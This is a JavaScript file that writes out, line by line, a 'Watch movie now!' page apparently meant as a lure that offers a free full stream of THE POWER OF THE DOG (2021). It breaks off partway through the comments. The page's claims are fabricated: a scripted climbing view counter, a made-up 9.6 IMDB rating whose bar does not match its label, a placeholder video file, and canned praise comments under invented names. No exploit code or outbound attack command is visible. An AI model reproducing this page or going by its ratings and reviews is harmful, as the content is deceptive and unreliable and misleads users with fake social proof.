document.write('');
document.write('<!DOCTYPE html>');
document.write('<html class="bootstrap-layout">');
document.write('    <head>');
document.write('    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">');
document.write('    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">');
document.write('    <meta http-equiv="X-UA-Compatible" content="IE=edge"><script type="text/javascript">(window.NREUM||(NREUM={})).init={ajax:{deny_list:["bam-cell.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"62915533ca",applicationID:"14035018"};window.NREUM||(NREUM={}),__nr_require=function(t,e,n){function r(n){if(!e[n]){var i=e[n]={exports:{}};t[n][0].call(i.exports,function(e){var i=t[n][1][e];return r(i||e)},i,i.exports)}return e[n].exports}if("function"==typeof __nr_require)return __nr_require;for(var i=0;i<n.length;i++)r(n[i]);return r}({1:[function(t,e,n){function r(){}function i(t,e,n,r){return function(){return s.recordSupportability("API/"+e+"/called"),o(t+e,[u.now()].concat(c(arguments)),n?null:this,r),n?void 0:this}}var o=t("handle"),a=t(10),c=t(11),f=t("ee").get("tracer"),u=t("loader"),s=t(4),d=NREUM;"undefined"==typeof window.newrelic&&(newrelic=d);var p=["setPageViewName","setCustomAttribute","setErrorHandler","finished","addToTrace","inlineHit","addRelease"],l="api-",v=l+"ixn-";a(p,function(t,e){d[e]=i(l,e,!0,"api")}),d.addPageAction=i(l,"addPageAction",!0),d.setCurrentRouteName=i(l,"routeName",!0),e.exports=newrelic,d.interaction=function(){return(new r).get()};var m=r.prototype={createTracer:function(t,e){var n={},r=this,i="function"==typeof e;return o(v+"tracer",[u.now(),t,n],r),function(){if(f.emit((i?"":"no-")+"fn-start",[u.now(),r,i],n),i)try{return e.apply(this,arguments)}catch(t){throw f.emit("fn-err",[arguments,this,t],n),t}finally{f.emit("fn-end",[u.now()],n)}}}};a("actionText,setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),function(t,e){m[e]=i(v,e)}),newrelic.noticeError=function(t,e){"string"==typeof t&&(t=new Error(t)),s.recordSupportability("API/noticeError/called"),o("err",[t,u.now(),!1,e])}},{}],2:[function(t,e,n){function r(t){if(NREUM.init){for(var e=NREUM.init,n=t.split("."),r=0;r<n.length-1;r++)if(e=e[n[r]],"object"!=typeof e)return;return e=e[n[n.length-1]]}}e.exports={getConfiguration:r}},{}],3:[function(t,e,n){var r=!1;try{var i=Object.defineProperty({},"passive",{get:function(){r=!0}});window.addEventListener("testPassive",null,i),window.removeEventListener("testPassive",null,i)}catch(o){}e.exports=function(t){return r?{passive:!0,capture:!!t}:!!t}},{}],4:[function(t,e,n){function r(t,e){var n=[a,t,{name:t},e];return o("storeMetric",n,null,"api"),n}function i(t,e){var n=[c,t,{name:t},e];return o("storeEventMetrics",n,null,"api"),n}var o=t("handle"),a="sm",c="cm";e.exports={constants:{SUPPORTABILITY_METRIC:a,CUSTOM_METRIC:c},recordSupportability:r,recordCustom:i}},{}],5:[function(t,e,n){function r(){return c.exists&&performance.now?Math.round(performance.now()):(o=Math.max((new Date).getTime(),o))-a}function i(){return o}var o=(new Date).getTime(),a=o,c=t(12);e.exports=r,e.exports.offset=a,e.exports.getLastTimestamp=i},{}],6:[function(t,e,n){function r(t){return!(!t||!t.protocol||"file:"===t.protocol)}e.exports=r},{}],7:[function(t,e,n){function r(t,e){var n=t.getEntries();n.forEach(function(t){"first-paint"===t.name?p("timing",["fp",Math.floor(t.startTime)]):"first-contentful-paint"===t.name&&p("timing",["fcp",Math.floor(t.startTime)])})}function i(t,e){var n=t.getEntries();if(n.length>0){var r=n[n.length-1];if(f&&f<r.startTime)return;p("lcp",[r])}}function o(t){t.getEntries().forEach(function(t){t.hadRecentInput||p("cls",[t])})}function a(t){if(t instanceof g&&!y){var e=Math.round(t.timeStamp),n={type:t.type};e<=l.now()?n.fid=l.now()-e:e>l.offset&&e<=Date.now()?(e-=l.offset,n.fid=l.now()-e):e=l.now(),y=!0,p("timing",["fi",e,n])}}function c(t){"hidden"===t&&(f=l.now(),p("pageHide",[f]))}if(!("init"in NREUM&&"page_view_timing"in NREUM.init&&"enabled"in NREUM.init.page_view_timing&&NREUM.init.page_view_timing.enabled===!1)){var f,u,s,d,p=t("handle"),l=t("loader"),v=t(9),m=t(3),g=NREUM.o.EV;if("PerformanceObserver"in window&&"function"==typeof window.PerformanceObserver){u=new PerformanceObserver(r);try{u.observe({entryTypes:["paint"]})}catch(h){}s=new PerformanceObserver(i);try{s.observe({entryTypes:["largest-contentful-paint"]})}catch(h){}d=new PerformanceObserver(o);try{d.observe({type:"layout-shift",buffered:!0})}catch(h){}}if("addEventListener"in document){var y=!1,w=["click","keydown","mousedown","pointerdown","touchstart"];w.forEach(function(t){document.addEventListener(t,a,m(!1))})}v(c)}},{}],8:[function(t,e,n){function r(t,e){if(!i)return!1;if(t!==i)return!1;if(!e)return!0;if(!o)return!1;for(var n=o.split("."),r=e.split("."),a=0;a<r.length;a++)if(r[a]!==n[a])return!1;return!0}var i=null,o=null,a=/Version\\/(\\S+)\\s+Safari/;if(navigator.userAgent){var c=navigator.userAgent,f=c.match(a);f&&c.indexOf("Chrome")===-1&&c.indexOf("Chromium")===-1&&(i="Safari",o=f[1])}e.exports={agent:i,version:o,match:r}},{}],9:[function(t,e,n){function r(t){function e(){t(c&&document[c]?document[c]:document[o]?"hidden":"visible")}"addEventListener"in document&&a&&document.addEventListener(a,e,i(!1))}var i=t(3);e.exports=r;var o,a,c;"undefined"!=typeof document.hidden?(o="hidden",a="visibilitychange",c="visibilityState"):"undefined"!=typeof document.msHidden?(o="msHidden",a="msvisibilitychange"):"undefined"!=typeof document.webkitHidden&&(o="webkitHidden",a="webkitvisibilitychange",c="webkitVisibilityState")},{}],10:[function(t,e,n){function r(t,e){var n=[],r="",o=0;for(r in t)i.call(t,r)&&(n[o]=e(r,t[r]),o+=1);return n}var i=Object.prototype.hasOwnProperty;e.exports=r},{}],11:[function(t,e,n){function r(t,e,n){e||(e=0),"undefined"==typeof n&&(n=t?t.length:0);for(var r=-1,i=n-e||0,o=Array(i<0?0:i);++r<i;)o[r]=t[e+r];return o}e.exports=r},{}],12:[function(t,e,n){e.exports={exists:"undefined"!=typeof window.performance&&window.performance.timing&&"undefined"!=typeof window.performance.timing.navigationStart}},{}],ee:[function(t,e,n){function r(){}function i(t){function e(t){return t&&t instanceof r?t:t?u(t,f,a):a()}function n(n,r,i,o,a){if(a!==!1&&(a=!0),!l.aborted||o){t&&a&&t(n,r,i);for(var c=e(i),f=m(n),u=f.length,s=0;s<u;s++)f[s].apply(c,r);var p=d[w[n]];return p&&p.push([b,n,r,c]),c}}function o(t,e){y[t]=m(t).concat(e)}function v(t,e){var n=y[t];if(n)for(var r=0;r<n.length;r++)n[r]===e&&n.splice(r,1)}function m(t){return y[t]||[]}function g(t){return p[t]=p[t]||i(n)}function h(t,e){l.aborted||s(t,function(t,n){e=e||"feature",w[n]=e,e in d||(d[e]=[])})}var y={},w={},b={on:o,addEventListener:o,removeEventListener:v,emit:n,get:g,listeners:m,context:e,buffer:h,abort:c,aborted:!1};return b}function o(t){return u(t,f,a)}function a(){return new r}function c(){(d.api||d.feature)&&(l.aborted=!0,d=l.backlog={})}var f="nr@context",u=t("gos"),s=t(10),d={},p={},l=e.exports=i();e.exports.getOrSetContext=o,l.backlog=d},{}],gos:[function(t,e,n){function r(t,e,n){if(i.call(t,e))return t[e];var r=n();if(Object.defineProperty&&Object.keys)try{return Object.defineProperty(t,e,{value:r,writable:!0,enumerable:!1}),r}catch(o){}return t[e]=r,r}var i=Object.prototype.hasOwnProperty;e.exports=r},{}],handle:[function(t,e,n){function r(t,e,n,r){i.buffer([t],r),i.emit(t,e,n)}var i=t("ee").get("handle");e.exports=r,r.ee=i},{}],id:[function(t,e,n){function r(t){var e=typeof t;return!t||"object"!==e&&"function"!==e?-1:t===window?0:a(t,o,function(){return i++})}var i=1,o="nr@id",a=t("gos");e.exports=r},{}],loader:[function(t,e,n){function r(){if(!T++){var t=P.info=NREUM.info,e=g.getElementsByTagName("script")[0];if(setTimeout(u.abort,3e4),!(t&&t.licenseKey&&t.applicationID&&e))return u.abort();f(O,function(e,n){t[e]||(t[e]=n)});var n=a();c("mark",["onload",n+P.offset],null,"api"),c("timing",["load",n]);var r=g.createElement("script");0===t.agent.indexOf("http://")||0===t.agent.indexOf("https://")?r.src=t.agent:r.src=v+"://"+t.agent,e.parentNode.insertBefore(r,e)}}function i(){"complete"===g.readyState&&o()}function o(){c("mark",["domContent",a()+P.offset],null,"api")}var a=t(5),c=t("handle"),f=t(10),u=t("ee"),s=t(8),d=t(6),p=t(2),l=t(3),v=p.getConfiguration("ssl")===!1?"http":"https",m=window,g=m.document,h="addEventListener",y="attachEvent",w=m.XMLHttpRequest,b=w&&w.prototype,E=!d(m.location);NREUM.o={ST:setTimeout,SI:m.setImmediate,CT:clearTimeout,XHR:w,REQ:m.Request,EV:m.Event,PR:m.Promise,MO:m.MutationObserver};var x=""+location,O={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",agent:"js-agent.newrelic.com/nr-1212.min.js"},M=w&&b&&b[h]&&!/CriOS/.test(navigator.userAgent),P=e.exports={offset:a.getLastTimestamp(),now:a,origin:x,features:{},xhrWrappable:M,userAgent:s,disabled:E};if(!E){t(1),t(7),g[h]?(g[h]("DOMContentLoaded",o,l(!1)),m[h]("load",r,l(!1))):(g[y]("onreadystatechange",i),m[y]("onload",r)),c("mark",["firstbyte",a.getLastTimestamp()],null,"api");var T=0}},{}],"wrap-function":[function(t,e,n){function r(t,e){function n(e,n,r,f,u){function nrWrapper(){var o,a,s,p;try{a=this,o=d(arguments),s="function"==typeof r?r(o,a):r||{}}catch(l){i([l,"",[o,a,f],s],t)}c(n+"start",[o,a,f],s,u);try{return p=e.apply(a,o)}catch(v){throw c(n+"err",[o,a,v],s,u),v}finally{c(n+"end",[o,a,p],s,u)}}return a(e)?e:(n||(n=""),nrWrapper[p]=e,o(e,nrWrapper,t),nrWrapper)}function r(t,e,r,i,o){r||(r="");var c,f,u,s="-"===r.charAt(0);for(u=0;u<e.length;u++)f=e[u],c=t[f],a(c)||(t[f]=n(c,s?f+r:r,i,f,o))}function c(n,r,o,a){if(!v||e){var c=v;v=!0;try{t.emit(n,r,o,e,a)}catch(f){i([f,n,r,o],t)}v=c}}return t||(t=s),n.inPlace=r,n.flag=p,n}function i(t,e){e||(e=s);try{e.emit("internal-error",t)}catch(n){}}function o(t,e,n){if(Object.defineProperty&&Object.keys)try{var r=Object.keys(t);return r.forEach(function(n){Object.defineProperty(e,n,{get:function(){return t[n]},set:function(e){return t[n]=e,e}})}),e}catch(o){i([o],n)}for(var a in t)l.call(t,a)&&(e[a]=t[a]);return e}function a(t){return!(t&&t instanceof Function&&t.apply&&!t[p])}function c(t,e){var n=e(t);return n[p]=t,o(t,n,s),n}function f(t,e,n){var r=t[e];t[e]=c(r,n)}function u(){for(var t=arguments.length,e=new Array(t),n=0;n<t;++n)e[n]=arguments[n];return e}var s=t("ee"),d=t(11),p="nr@original",l=Object.prototype.hasOwnProperty,v=!1;e.exports=r,e.exports.wrapFunction=c,e.exports.wrapInPlace=f,e.exports.argsToArray=u},{}]},{},["loader"]);</script>   ');
document.write('');
document.write('    <title>Watch movie now!</title>');
document.write('    <meta name="description" content="Watch movie now!">');
document.write('    <meta property="og:title" content="Watch movie now!">');
document.write('    <meta property="og:description" content="Watch movie now!">');
document.write('    <meta name="robots" content="all">');
document.write('    <meta name="referrer" content="no-referrer">');
document.write('');
document.write('    <!-- Material Design Icons  -->');
document.write('    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">');
document.write('');
document.write('    <!-- Roboto Web Font -->');
document.write('    <link href="https://fonts.googleapis.com/css?family=Roboto:regular,bold,italic,thin,light,bolditalic,black,medium&amp;lang=en" rel="stylesheet">');
document.write('');
document.write('    <!-- App CSS -->');
document.write('    <link type="text/css" href="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/style.min.css" rel="stylesheet">');
document.write('    <link type="text/css" href="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/nouislider.min.css" rel="stylesheet">');
document.write('    <link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">');
document.write('    <link type="text/css" href="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/sweetAlert.css" rel="stylesheet">');
document.write('    <link type="text/css" href="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/facebook-comments.css" rel="stylesheet">');
document.write('    <style type="text/css" media="screen and (min-width: 0px) and (max-width: 400px)">');
document.write('        #imageContainer{');
document.write('            height:500px;');
document.write('        }');
document.write('        .movieThumb{');
document.write('            max-height:500px !important;');
document.write('            margin-right:20px;');
document.write('        }');
document.write('        #shareCard{');
document.write('            display:none;');
document.write('        }');
document.write('');
document.write('    </style>');
document.write('    <style type="text/css" media="screen and (min-width: 400px)">');
document.write('        #imageContainer{');
document.write('            height: 382px;');
document.write('        }');
document.write('        .movieThumb{');
document.write('            width:100%;');
document.write('        }');
document.write('');
document.write('    </style>');
document.write('    <style type="text/css">');
document.write('        #video{');
document.write('            cursor: pointer;');
document.write('        }');
document.write('        .fb_comments_count_cover{');
document.write('            width: 500px;');
document.write('        }');
document.write('        .block-msg-default,');
document.write('        .block-msg-message-loader {');
document.write('            border: none !important;');
document.write('            background-color: transparent !important;');
document.write('        }');
document.write('        .block-msg-default .fa {');
document.write('            font-size: 42px;');
document.write('            color: #fff;');
document.write('            display: inline-block;');
document.write('            width: 42px;');
document.write('            height: 40px;');
document.write('        }');
document.write('        .block-msg-default h6 {');
document.write('            margin-top: 8px;');
document.write('            color: #fff;');
document.write('            font-size: 17px;');
document.write('            line-height: 24px;');
document.write('        }');
document.write('        .block-msg-message-loader .blockui-default-message {');
document.write('            padding: 20px;');
document.write('            -webkit-border-radius: .25rem;');
document.write('            border-radius: .25rem;');
document.write('            color: #102943;');
document.write('            font-size: 17px;');
document.write('            background: #fff;');
document.write('        }');
document.write('        .videoControl {');
document.write('            display: inline-block;');
document.write('            font-weight: 400;');
document.write('            text-align: center;');
document.write('            white-space: nowrap;');
document.write('            vertical-align: middle;');
document.write('            cursor: pointer;');
document.write('            -webkit-user-select: none;');
document.write('            user-select: none;');
document.write('            border: 1px solid #eceeef;');
document.write('            padding: 10px 10px;');
document.write('            padding-bottom: 27px;');
document.write('            font-size: 1rem;');
document.write('            line-height: 1.5;');
document.write('            border-radius: 0;');
document.write('            color: #818a91;');
document.write('            background-color: #fff;');
document.write('            height: 35px;');
document.write('        }');
document.write('        .noUi-base {');
document.write('            background-color: #0074d9;');
document.write('        }');
document.write('        .noUi-origin{');
document.write('            background-color: white;');
document.write('        }');
document.write('        video::-webkit-media-controls-enclosure {');
document.write('            display:none !important;');
document.write('        }');
document.write('');
document.write('');
document.write('');
document.write('        #caption {');
document.write('            position: absolute;');
document.write('            text-align: center;');
document.write('            padding: 10px;');
document.write('            background-color: #000000;');
document.write('            color: white;');
document.write('            opacity: 0.5;');
document.write('            width: 850px;');
document.write('            display:none;');
document.write('        }');
document.write('        #sidebar a .fa{');
document.write('            padding-right:10px;');
document.write('        }');
document.write('        #sidebar a{');
document.write('            width:100%;');
document.write('            margin-bottom: 10px;');
document.write('        }');
document.write('');
document.write('');
document.write('        .actors .label{');
document.write('            white-space: normal !important;');
document.write('        }');
document.write('    </style>');
document.write('    <style id="custom_css">');
document.write('      ');
document.write('    </style>');
document.write('</head>');
document.write('');
document.write('<body class="layout-container ls-top-navbar breakpoint-1600">');
document.write('<nav class="navbar navbar-dark bg-primary navbar-full navbar-fixed-top">');
document.write('    <div class="container">');
document.write('        <!-- Brand -->');
document.write('        <a href="#" class="navbar-brand movieKeywordLink">Watch Free Movies</a>');
document.write('    </div>');
document.write('</nav>');
document.write('<!-- // END Navbar -->');
document.write('');
document.write('<!-- Content -->');
document.write('<div class="layout-content" data-scrollable="">');
document.write('    <div class="container">');
document.write('');
document.write('        <ol class="breadcrumb">');
document.write('            <li><a href="#" class="movieKeywordLink">Movies</a></li>');
document.write('            <li class="active"></li>');
document.write('        </ol>');
document.write('        <div class="card card-stats-primary">');
document.write('            <div class="card-block">');
document.write('                <div class="media">');
document.write('                    <div class="media-left media-middle">');
document.write('                        <i class="material-icons text-muted-light">video_library</i>');
document.write('                    </div>');
document.write('                    <div class="media-body media-middle">');
document.write('                        Watching Movie:');
document.write('                        <strong>THE POWER OF THE DOG (2021)</strong>');
document.write('                    </div>');
document.write('                </div>');
document.write('            </div>');
document.write('        </div>');
document.write('        <div class="row">');
document.write('            <div class="col-md-12 col-lg-10">');
document.write('                <div class="card">');
document.write('                    <div class="card-header bg-white">');
document.write('                        <h4 class="card-title">Video Player</h4>');
document.write('                    </div>');
document.write('                    <div class="card-block center videoContainerDiv">');
document.write('                        <div id="video-container" style="width:100%;">');
document.write('                            <!-- Video -->');
document.write('                            <div id="videoBlockContainer" style="width:100%;height:355px;margin: 0 auto;position: relative">');
document.write('                                <img style="width:100%;height:355px;position: absolute;display:none;" id="thumbnail" src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/thumbnail.png">');
document.write('                                <div id="caption">THE POWER OF THE DOG - (2021)</div>');
document.write('                                <video id="video" width="100%" height="355" style="width:100%;height: 355px;">');
document.write('                                    <source src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/loaded-movie.mp4" type="video/mp4">');
document.write('                                    <p>');
document.write('                                        <script></script>');
document.write('                                        Your browser doesn\'t support HTML5 video.');
document.write('                                    </p>');
document.write('                                </video>');
document.write('                            </div>');
document.write('');
document.write('                            <!-- Video Controls -->');
document.write('                            <div id="video-controls" style="margin-top:20px;" class="row">');
document.write('                                <div class="col-lg-2 col-md-2 col-sm-4 col-xl-2" style="padding: 0">');
document.write('                                <button style="width: 100%;" type="button" class="btn btn-white" id="playButton">');
document.write('                                    <i class="fa fa-play"></i>');
document.write('                                    <span class="icon-text"> Play</span>');
document.write('                                </button>');
document.write('                                </div>');
document.write('');
document.write('                                <div class="col-lg-7 col-md-7 col-sm-8 col-xl-8" style="padding: 0;">');
document.write('                                <div class="videoControl" style="width:100%;position: relative;">');
document.write('                                    <div id="slider-range" class="" style="width:65%;display: inline-block;float: left;margin-left:10px;"></div>');
document.write('                                    <div id="time" style="font-size:10px;display:inline-block;margin-top: 3px;position:absolute;right:8px;top:7px;"><span id="currentTimestamp">00:00:00</span>/<span id="totalTimestamp">02:00:59</span></div>');
document.write('                                </div>');
document.write('                                </div>');
document.write('                                <div class="col-lg-3 col-md-3 col-sm-12 col-xl-2" style="padding: 0;">');
document.write('                                <button style="width: 50%;box-sizing: border-box;" type="button" class="btn btn-white" id="volume">');
document.write('                                    <i class="fa fa-volume-up"></i>');
document.write('                                </button><button style="width: 50%;box-sizing: border-box;" type="button" class="btn btn-white" id="fullscreen">');
document.write('                                    <i class="fa fa-arrows-alt"></i>');
document.write('                                </button>');
document.write('                                </div>');
document.write('');
document.write('                            </div>');
document.write('                        </div>');
document.write('                    </div>');
document.write('                </div>');
document.write('            </div>');
document.write('            <div class="col-md-6 col-lg-2" id="sidebar">');
document.write('                <div class="card" id="shareCard">');
document.write('                    <div class="card-header bg-white">');
document.write('                        <h4 class="card-title">Share</h4>');
document.write('                        <p class="card-subtitle">Social Media</p>');
document.write('                    </div>');
document.write('                    <div class="card-block center">');
document.write('                        <a type="button" class="btn btn-primary">');
document.write('                            <i class="fa fa-facebook"></i> Facebook');
document.write('                        </a>');
document.write('                        <a type="button" class="btn btn-secondary">');
document.write('                            <i class="fa fa-twitter"></i> Twitter');
document.write('                        </a>');
document.write('                        <a type="button" class="btn btn-white">');
document.write('                            <i class="fa fa-google-plus"></i> Google');
document.write('                        </a>');
document.write('                    </div>');
document.write('                </div>');
document.write('            </div>');
document.write('            <div class="col-md-6 col-lg-2" id="sidebar2">');
document.write('                <div class="card">');
document.write('                    <div class="card-header bg-white">');
document.write('                        <div class="media">');
document.write('                            <div class="media-body media-middle">');
document.write('                                <h4 class="card-title">Viewing Activity</h4>');
document.write('                                <p class="card-subtitle">Stats</p>');
document.write('                            </div>');
document.write('                        </div>');
document.write('                    </div>');
document.write('                    <ul class="list-group list-group-fit">');
document.write('                        <li class="list-group-item">');
document.write('                            <div class="media m-b-0">');
document.write('                                <div class="media-left media-middle">');
document.write('                                    <i class="fa fa-eye"></i>');
document.write('                                </div>');
document.write('                                <div class="media-body media-middle">');
document.write('                                    <small class="text-muted increase" data-count="11223489">11,223,601</small>');
document.write('                                </div>');
document.write('                            </div>');
document.write('                        </li>');
document.write('                        <li class="list-group-item">');
document.write('                            <div class="media m-b-0">');
document.write('                                <div class="media-left media-middle">');
document.write('                                    <i class="fa fa-cog fa-spin"></i>');
document.write('                                </div>');
document.write('                                <div class="media-body media-middle">');
document.write('                                    <span class="label label-pill label-success">Online</span>');
document.write('                                </div>');
document.write('                            </div>');
document.write('                        </li>');
document.write('                    </ul>');
document.write('                </div>');
document.write('            </div>');
document.write('        </div>');
document.write('        <div class="row">');
document.write('            <div class="col-md-6">');
document.write('                <div class="card-group m-b-2">');
document.write('                    <div class="card">');
document.write('                        <div class="card-block" id="imageContainer">');
document.write('                            <p class="card-text"><img src="" class="movieThumb" align="left"></p>');
document.write('');
document.write('                        </div>');
document.write('                    </div>');
document.write('                    <div class="card">');
document.write('                        <div class="card-block">');
document.write('                            <h4 class="card-title">THE POWER OF THE DOG (2021)</h4>');
document.write('                            <p class="card-text" style="max-height:300px;text-overflow:ellipsis;overflow-y: auto;">');
document.write('                                Watch THE POWER OF THE DOG Full Film');
document.write('                            </p>');
document.write('                        </div>');
document.write('                    </div>');
document.write('                </div>');
document.write('            </div>');
document.write('            <div class="col-md-6">');
document.write('                <div class="card">');
document.write('                    <div class="card-header bg-white">');
document.write('                        <div class="media">');
document.write('                            <div class="media-body">');
document.write('                                <h4 class="card-title">Movie</h4>');
document.write('                                <p class="card-subtitle">Information &amp; Ratings</p>');
document.write('                            </div>');
document.write('                            <div class="media-right media-middle">');
document.write('                                <a class="btn btn-white movieKeywordLink" href="#"> Watch More Movies</a>');
document.write('                            </div>');
document.write('                        </div>');
document.write('                    </div>');
document.write('                    <ul class="list-group list-group-fit m-b-0">');
document.write('                        <li class="list-group-item">');
document.write('                            <div class="media">');
document.write('                                <div class="media-body media-middle">');
document.write('                                    IMDB Rating');
document.write('                                </div>');
document.write('                                <div class="media-right media-middle">');
document.write('                                    <div class="center">');
document.write('                                        <span class="label label-pill label-primary m-b-05">9.6</span>');
document.write('                                        <progress class="progress progress-primary m-b-0" value="85" max="100" style="width:100px">96%</progress>');
document.write('                                    </div>');
document.write('                                </div>');
document.write('                            </div>');
document.write('                        </li>');
document.write('                        <li class="list-group-item">');
document.write('                            <div class="media">');
document.write('                                <div class="media-body media-middle">');
document.write('                                    Duration');
document.write('                                </div>');
document.write('                                <div class="media-right media-middle">');
document.write('                                    <div class="center" style="width:100px">');
document.write('                                        <span class="label label-pill label-default m-b-05"></span>');
document.write('                                    </div>');
document.write('                                </div>');
document.write('                            </div>');
document.write('                        </li>');
document.write('                        <li class="list-group-item">');
document.write('                            <div class="media">');
document.write('                                <div class="media-body media-middle">');
document.write('                                    Actors');
document.write('                                </div>');
document.write('                                <div class="media-right media-middle">');
document.write('                                    <div class="center actors" style="width:100px;">');
document.write('                                        Benedict Cumberba,Kirsten Dunst');
document.write('                                        <span class="label label-pill label-primary m-b-05">Actor1</span><span class="label label-pill label-warning m-b-05">Actor2</span>');
document.write('                                    </div>');
document.write('                                </div>');
document.write('                            </div>');
document.write('                        </li>');
document.write('                        <li class="list-group-item">');
document.write('                            <div class="media">');
document.write('                                <div class="media-body media-middle">');
document.write('                                    Quality');
document.write('                                </div>');
document.write('                                <div class="media-right media-middle">');
document.write('                                    <div class="center" style="width:100px">');
document.write('                                        <span class="label label-pill label-success m-b-05">High Definition</span>');
document.write('                                    </div>');
document.write('                                </div>');
document.write('                            </div>');
document.write('                        </li>');
document.write('                    </ul>');
document.write('                </div>');
document.write('            </div>');
document.write('        </div>');
document.write('        <div class="row">');
document.write('            <div class="col-md-12">');
document.write('');
document.write('                <div class="card">');
document.write('');
document.write('                    <div class="card-block">');
document.write('                        <h5 class="card-title">Comments</h5>');
document.write('');
document.write('                        <h6>8 Comments</h5>');
document.write('                        <div class="row">');
document.write('                            <div class="col">');
document.write('                                <div class="col-xs-12">');
document.write('                                    <img src="https://storage.googleapis.com/appspot-cdn/assets/img/odA9sNLrE86.jpg" style="position:absolute;float:left;">');
document.write('                                    <textarea class="form-control" placeholder="Add a comment..." style="margin-left: 60px;width:85%"></textarea>');
document.write('                                </div>');
document.write('                            </div>');
document.write('                        </div>');
document.write('');
document.write('                        <div class="fb_comment_section">');
document.write('                            <div class="fb_comment_wrapper">');
document.write('                                <div class="fb_image_block">');
document.write('                                    <img src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/14695289640b4fd4b01bad9b47a79f53815f067538.jpg" class="fb_pic">');
document.write('                                </div>');
document.write('                                <div class="fb_comment_block">');
document.write('                                    <div class="fb_name">Raushan Bekturova</div>');
document.write('                                    <div class="fb_comment">good quality thanks for hd</div>');
document.write('                                    <div class="fb_meta">');
document.write('                                        <a href="#" class="fb_like fb_meta_item">Like</a> ·');
document.write('                                        <a href="#" class="fb_like fb_meta_item">Reply</a> ·');
document.write('');
document.write('                                        <img class="fb_like_button fb_meta_item" src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/like.png"><span class="like_count fb_meta_item">183</span> ·');
document.write('                                        <span class="fb_timestamp">19 hrs ago</span></div>');
document.write('                                </div>');
document.write('                            </div><div class="fb_comment_wrapper">');
document.write('                            <div class="fb_image_block">');
document.write('                                <img src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/1469528964ca399c687c1e6b531460d5a28288799f.jpg" class="fb_pic">');
document.write('                            </div>');
document.write('                            <div class="fb_comment_block">');
document.write('                                <div class="fb_name">Melissa Sweetman</div>');
document.write('                                <div class="fb_comment">Great plot! Great movie! Thank you I love this site!</div>');
document.write('                                <div class="fb_meta">');
document.write('                                    <a href="#" class="fb_like fb_meta_item">Like</a> ·');
document.write('                                    <a href="#" class="fb_like fb_meta_item">Reply</a> ·');
document.write('');
document.write('                                    <img class="fb_like_button fb_meta_item" src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/like.png"><span class="like_count fb_meta_item">31</span> ·');
document.write('                                    <span class="fb_timestamp">4 days ago</span></div>');
document.write('                            </div>');
document.write('                        </div><div class="fb_comment_wrapper">');
document.write('                            <div class="fb_image_block">');
document.write('                                <img src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/1469528961583b2dbf531b948eae7a4d8f97c97c7c.jpg" class="fb_pic">');
document.write('                            </div>');
document.write('                            <div class="fb_comment_block">');
document.write('                                <div class="fb_name">Carmenza Duran Pena</div>');
document.write('                                <div class="fb_comment">Good to watch movie.</div>');
document.write('                                <div class="fb_meta">');
document.write('                                    <a href="#" class="fb_like fb_meta_item">Like</a> ·');
document.write('                                    <a href="#" class="fb_like fb_meta_item">Reply</a> ·');
document.write('');
document.write('                                    <img class="fb_like_button fb_meta_item" src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/like.png"><span class="like_count fb_meta_item">74</span> ·');
document.write('                                    <span class="fb_timestamp">6 days ago</span></div>');
document.write('                            </div>');
document.write('                        </div><div class="fb_comment_wrapper">');
document.write('                            <div class="fb_image_block">');
document.write('                                <img src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/146952895535e152e41f29c290f51c3044fb62a025.jpg" class="fb_pic">');
document.write('                            </div>');
document.write('                            <div class="fb_comment_block">');
document.write('                                <div class="fb_name">Andy Russell</div>');
document.write('                                <div class="fb_comment">wow awesome movie</div>');
document.write('                                <div class="fb_meta">');
document.write('                                    <a href="#" class="fb_like fb_meta_item">Like</a> ·');
document.write('                                    <a href="#" class="fb_like fb_meta_item">Reply</a> ·');
document.write('');
document.write('                                    <img class="fb_like_button fb_meta_item" src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/like.png"><span class="like_count fb_meta_item">25</span> ·');
document.write('                                    <span class="fb_timestamp">2 weeks ago</span></div>');
document.write('                            </div>');
document.write('                        </div><div class="fb_comment_wrapper">');
document.write('                            <div class="fb_image_block">');
document.write('                                <img src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/1469528967c8b24744e210bac76a5a7fffb7beade1.jpg" class="fb_pic">');
document.write('                            </div>');
document.write('                            <div class="fb_comment_block">');
document.write('                                <div class="fb_name">Franklin Torres</div>');
document.write('                                <div class="fb_comment">working great thanks</div>');
document.write('                                <div class="fb_meta">');
document.write('                                    <a href="#" class="fb_like fb_meta_item">Like</a> ·');
document.write('                                    <a href="#" class="fb_like fb_meta_item">Reply</a> ·');
document.write('');
document.write('                                    <img class="fb_like_button fb_meta_item" src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/like.png"><span class="like_count fb_meta_item">32</span> ·');
document.write('                                    <span class="fb_timestamp">2 weeks ago</span></div>');
document.write('                            </div>');
document.write('                        </div><div class="fb_comment_wrapper">');
document.write('                            <div class="fb_image_block">');
document.write('                                <img src="https://storage.googleapis.com/appspot-cdn/assets/tmpl-13/1469528955b3ab008f786de5e84e8b823e95880d37.jpg" class="fb_pic">');
document.write('                            </div>');
document.write('                            <div class="fb_comment_block">');
document.write('                                <div class="fb_name">Paige Hubbs</div>');
document.write('                                <div class="fb_comment">Really good movie to watch. Enjoyed it!</div>');
document.write('                                <div class="fb_meta">');
document.write('                                    <a href="#" class="fb_like fb_meta_item">Like</a> ·');
